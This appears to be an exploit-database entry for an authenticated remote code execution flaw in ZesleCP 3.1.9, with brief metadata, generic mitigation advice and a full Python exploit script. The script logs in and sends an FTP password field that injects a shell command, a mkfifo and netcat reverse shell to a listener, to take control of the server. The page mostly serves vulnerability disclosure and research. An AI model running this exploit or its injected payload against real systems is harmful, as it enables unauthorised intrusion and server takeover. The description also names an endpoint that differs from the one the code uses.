ZesleCP 3.1.9 - Remote Code Execution (RCE) (Authenticated)

vendor:

ZesleCP

by:

Numan Türle

9,8

CVSS

HIGH

Remote Code Execution (RCE)

CWE

Product Name: ZesleCP

Affected Version From: 3.1.9

Affected Version To: 3.1.9

Patch Exists: YES

Related CWE: None

CPE: a:zeslecp:zeslecp:3.1.9

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2021

ZesleCP 3.1.9 – Remote Code Execution (RCE) (Authenticated)

ZesleCP 3.1.9 is vulnerable to Remote Code Execution (RCE) when an authenticated user sends a malicious payload to the /json-api/cpanel endpoint. The payload creates a FTP account with a malicious command that is executed when the FTP account is created. This allows an attacker to execute arbitrary code on the server.

Mitigation:

Ensure that all users have strong passwords and that only trusted users have access to the system. Additionally, ensure that all software is up to date and patched.

Source

Exploit-DB raw data:

# Title: ZesleCP 3.1.9 - Remote Code Execution (RCE) (Authenticated)
# Date: 27.08.2021
# Author: Numan Türle
# Vendor Homepage: https://zeslecp.com/
# Software Link: https://zeslecp.com/
# Version: <=3.1.9
# https://www.youtube.com/watch?v=5lTDTEBVq-0

#!/usr/bin/python3
# -*- coding: utf-8 -*-
# ZesleCP - Remote Code Execution (Authenticated) ( Version 3.1.9 )
# author: twitter.com/numanturle
# usage: zeslecp.py [-h] -u HOST -l LOGIN -p PASSWORD
# https://www.youtube.com/watch?v=5lTDTEBVq-0


import argparse,requests,warnings,json,random,string
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from cmd import Cmd

warnings.simplefilter('ignore',InsecureRequestWarning)

def init():
    parser = argparse.ArgumentParser(description='ZesleCP - Remote Code Execution (Authenticated) ( Version 3.1.9 )')
    parser.add_argument('-u','--host',help='Host', type=str, required=True)
    parser.add_argument('-l', '--login',help='Username', type=str, required=True)
    parser.add_argument('-p', '--password',help='Password', type=str, required=True)
    args = parser.parse_args()
    exploit(args)

def exploit(args):

    listen_ip = "0.0.0.0"
    listen_port = 1337

    session = requests.Session()
    target = "https://{}:2087".format(args.host)
    username = args.login
    password = args.password

    print("[+] Target {}".format(target))

    login = session.post(target+"/login", verify=False, json={"username":username,"password":password})
    login_json = json.loads(login.content)

    if login_json["success"]:
        session_hand_login = session.cookies.get_dict()

        print("[+] Login successfully")
        print("[+] Creating ftp account")

        ftp_username = "".join(random.choices(string.ascii_lowercase + string.digits, k=10))

        print("[+] Username : {}".format(ftp_username))
        
        print("[+] Send payload....")

        payload = {
            "ftp_user": ftp_username,
            "ftp_password":"1337';rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f;echo '".format(listen_ip,listen_port)
        }

        try:
            feth_weblist = session.post(target+"/core/ftp", verify=False, json=payload, timeout=3)
        except requests.exceptions.ReadTimeout: 
            pass

            print("[+] Successful")
    else:
        print("[-] AUTH : Login failed msg: {}".format(login_json["message"]))

if __name__ == "__main__":
    init()